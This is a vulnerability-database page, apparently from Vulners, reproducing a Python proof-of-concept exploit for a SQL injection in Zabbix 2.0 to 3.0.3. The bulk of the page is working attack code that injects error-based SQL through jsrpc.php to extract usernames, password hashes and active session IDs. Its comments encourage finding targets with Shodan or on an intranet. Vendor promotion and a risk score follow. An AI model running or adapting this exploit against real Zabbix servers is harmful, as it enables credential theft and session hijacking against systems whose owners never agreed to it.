Vulners
Lucene search
Zabbix 2.0 < 3.0.3 - SQL Injection
# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC
# Data: 20-08-2016
# Software Link: www.zabbix.com
# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82)
# Version: Zabbix 2.0-3.0.x(<3.0.4)
# PoC Author: Zzzians
# Contact: [email protected]
# Test on: Linux (Debian/CentOS/Ubuntu)
# -*- coding: utf_8 -*-
# Use Shodan or and enjoy :)
# Comb the intranet for zabbix and enjoy :)
import sys,os,re,urllib2
def Inject(url,sql,reg):
payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
try:
response = urllib2.urlopen(payload, timeout=20).read()
except Exception, msg:
print '\t\tOpps,an error occurs...',msg
else:
result_reg = re.compile(reg)
results = result_reg.findall(response)
print payload #Uncomment this to see details
if results:
return results[0]
def exploit(url,userid):
passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~")
if(password):
print '[+]Username~Password : %s' % password
else:
print '[-]Get Password Failed'
session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~")
if(session_id):
print "[+]Session_id:%s" % session_id
else:
print "[-]Get Session id Failed"
print '\n'
def main():
print '=' * 70
print '\t 2.0.x? < Zabbix < 3.0.4 SQL Inject Python Exploit Poc'
print '\t\t Author:Zzzians([email protected])'
print '\t Reference:http://seclists.org/fulldisclosure/2016/Aug/82'
print '\t\t\t Time:2016-08-20\n'
urls = ["http://10.15.5.86"]
ids = [1,2]
for url in urls:
if url[-1] != '/': url += '/'
print '='*25 + url + '='*25
for userid in ids:
exploit(url,userid)
main()
# 0day.today [2018-02-16] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Sep 2016 00:00Current
7.1High risk
Vulners AI Score7.1